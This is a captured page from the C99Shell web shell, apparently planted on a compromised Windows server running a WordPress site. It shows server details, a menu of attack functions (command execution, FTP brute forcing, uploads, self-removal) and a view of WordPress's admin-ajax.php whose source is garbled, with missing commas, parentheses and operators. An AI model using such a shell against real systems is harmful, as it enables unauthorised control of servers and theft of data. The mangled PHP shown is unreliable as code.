!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\htdocs\cumbredelclima\wp-admin\   drwxrwxrwx
Free 1.22 GB of 239.26 GB (0.51%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     admin-ajax.php (3.44 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * WordPress AJAX Process Execution.
 *
 * @package WordPress
 * @subpackage Administration
 *
 * @link https://codex.wordpress.org/AJAX_in_Plugins
 */

/**
 * Executing AJAX process.
 *
 * @since 2.1.0
 */
define'DOING_AJAX'true );
if ( ! 
defined'WP_ADMIN' ) ) {
    
define'WP_ADMIN'true );
}

/** Load WordPress Bootstrap */
require_once( dirnamedirname__FILE__ ) ) . '/wp-load.php' );

/** Allow for cross-domain requests (from the frontend). */
send_origin_headers();

// Require an action parameter
if ( empty( $_REQUEST['action'] ) )
    die( 
'0' );

/** Load WordPress Administration APIs */
require_once( ABSPATH 'wp-admin/includes/admin.php' );

/** Load Ajax Handlers for WordPress Core */
require_once( ABSPATH 'wp-admin/includes/ajax-actions.php' );

@
header'Content-Type: text/html; charset=' get_option'blog_charset' ) );
@
header'X-Robots-Tag: noindex' );

send_nosniff_header();
nocache_headers();

/** This action is documented in wp-admin/admin.php */
do_action'admin_init' );

$core_actions_get = array(
    
'fetch-list''ajax-tag-search''wp-compression-test''imgedit-preview''oembed-cache',
    
'autocomplete-user''dashboard-widgets''logged-in',
);

$core_actions_post = array(
    
'oembed-cache''image-editor''delete-comment''delete-tag''delete-link',
    
'delete-meta''delete-post''trash-post''untrash-post''delete-page''dim-comment',
    
'add-link-category''add-tag''get-tagcloud''get-comments''replyto-comment',
    
'edit-comment''add-menu-item''add-meta''add-user''closed-postboxes',
    
'hidden-columns''update-welcome-panel''menu-get-metabox''wp-link-ajax',
    
'menu-locations-save''menu-quick-search''meta-box-order''get-permalink',
    
'sample-permalink''inline-save''inline-save-tax''find_posts''widgets-order',
    
'save-widget''set-post-thumbnail''date_format''time_format''wp-fullscreen-save-post',
    
'wp-remove-post-lock''dismiss-wp-pointer''upload-attachment''get-attachment',
    
'query-attachments''save-attachment''save-attachment-compat''send-link-to-editor',
    
'send-attachment-to-editor''save-attachment-order''heartbeat''get-revision-diffs',
    
'save-user-color-scheme''update-widget''query-themes''parse-embed''set-attachment-thumbnail',
    
'parse-media-shortcode''destroy-sessions''install-plugin''update-plugin''press-this-save-post',
    
'press-this-add-category',
);

// Register core Ajax calls.
if ( ! empty( $_GET['action'] ) && in_array$_GET['action'], $core_actions_get ) )
    
add_action'wp_ajax_' $_GET['action'], 'wp_ajax_' str_replace'-''_'$_GET['action'] ), );

if ( ! empty( 
$_POST['action'] ) && in_array$_POST['action'], $core_actions_post ) )
    
add_action'wp_ajax_' $_POST['action'], 'wp_ajax_' str_replace'-''_'$_POST['action'] ), );

add_action'wp_ajax_nopriv_heartbeat''wp_ajax_nopriv_heartbeat');

if ( 
is_user_logged_in() ) {
    
/**
     * Fires authenticated AJAX actions for logged-in users.
     *
     * The dynamic portion of the hook name, `$_REQUEST['action']`,
     * refers to the name of the AJAX action callback being fired.
     *
     * @since 2.1.0
     */
    
do_action'wp_ajax_' $_REQUEST['action'] );
} else {
    
/**
     * Fires non-authenticated AJAX actions for logged-out users.
     *
     * The dynamic portion of the hook name, `$_REQUEST['action']`,
     * refers to the name of the AJAX action callback being fired.
     *
     * @since 2.8.0
     */
    
do_action'wp_ajax_nopriv_' $_REQUEST['action'] );
}
// Default status
die( '0' );

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--